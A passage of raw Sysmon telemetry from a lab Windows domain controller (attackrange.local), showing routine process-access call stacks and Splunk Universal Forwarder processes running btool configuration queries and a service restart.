AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CDA-5FA1-0701-000000008801}2600C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-log 10341000x80000000000000005077Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0701-000000008801}2600C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005076Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005075Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005074Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005073Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005072Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005071Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005070Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005069Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005068Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005067Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0701-000000008801}2600C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005066Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.418{D28789B6-7CD7-5FA1-EA00-000000008801}38161744C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{D28789B6-7CDA-5FA1-0701-000000008801}2600C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+13ac4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005065Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.433{D28789B6-7CDA-5FA1-0701-000000008801}2600C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD7-5FA1-EA00-000000008801}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2676 10341000x80000000000000005064Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0601-000000008801}2712C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005063Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005062Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005061Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005060Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005059Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005058Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005057Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005056Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005055Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0601-000000008801}2712C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005054Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005053Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.167{D28789B6-7CDA-5FA1-0501-000000008801}10121928C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CDA-5FA1-0601-000000008801}2712C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005052Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.168{D28789B6-7CDA-5FA1-0601-000000008801}2712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CDA-5FA1-0501-000000008801}1012C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000005051Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.152{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0501-000000008801}1012C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005050Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 